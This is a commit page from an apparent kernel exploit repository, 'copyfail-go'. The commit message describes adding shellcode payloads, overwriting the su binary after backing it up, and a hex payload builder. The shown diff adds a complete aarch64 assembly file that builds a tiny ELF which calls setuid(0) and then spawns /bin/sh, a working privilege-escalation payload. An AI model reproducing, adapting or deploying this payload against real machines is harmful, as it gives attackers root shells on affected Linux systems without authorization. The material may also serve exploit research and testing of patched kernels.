milliways-infosec/copyfail-go
5
0
Fork 0
mirror of https://github.com/badsectorlabs/copyfail-go.git synced 2026-05-16 06:30:10 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

feat: allow binary exec and improve documentation

Browse source 
- Added new shellcode payloads for exec-argv1 and exec-bin-sh for amd64, i386, and aarch64 architectures.
- Introduced a backup feature for the su binary before overwriting it.
- Enhanced README.md with usage instructions and details about affected kernels.
- Added build-n-print.sh script for building and printing payloads in hex format.
This commit is contained in:
kernel-sanders 2026-04-30 01:33:04 -04:00
parent e52acbb172
commit 131f7d1842
12 changed files with 552 additions and 63 deletions
Download patch file Download diff file Expand all files Collapse all files

54
payloads/exec-bin-sh-aarch64.S Normal file
View file

@ -0,0 +1,54 @@
.section .text
.globl _start
// --- 64-bit ELF Header (64 bytes) ---
ehdr:
.byte 0x7F, 0x45, 0x4c, 0x46 // "\x7fELF"
.byte 2, 1, 1, 0 // 64-bit, little-endian, version 1
.byte 0, 0, 0, 0, 0, 0, 0, 0
.short 2 // e_type: Executable
.short 183 // e_machine: AArch64 (0xB7)
.int 1 // e_version
.quad 0x400078 // e_entry (0x400000 + 0x78)
.quad 0x40 // e_phoff (Program Header offset)
.quad 0 // e_shoff
.int 0 // e_flags
.short 64 // e_ehsize
.short 56 // e_phentsize
.short 1 // e_phnum
.short 0 // e_shentsize
.short 0 // e_shnum
.short 0 // e_shstrndx
// --- Program Header (PT_LOAD, 56 bytes) ---
phdr:
.int 1 // p_type: PT_LOAD
.int 5 // p_flags: PF_R | PF_X
.quad 0 // p_offset
.quad 0x400000 // p_vaddr
.quad 0x400000 // p_paddr
.quad file_end - ehdr // p_filesz
.quad file_end - ehdr // p_memsz
.quad 0x10000 // p_align
// --- Payload (52 bytes) ---
_start:
mov x0, #0
mov x8, #146 // SYS_setuid
svc #0
adr x0, sh // PC-relative load of the "sh" label
mov x1, #0
mov x2, #0
mov x8, #221 // SYS_execve
svc #0
mov x0, #0
mov x8, #93 // SYS_exit
svc #0
sh:
.asciz "/bin/sh" // 8 bytes (includes null terminator)
file_end: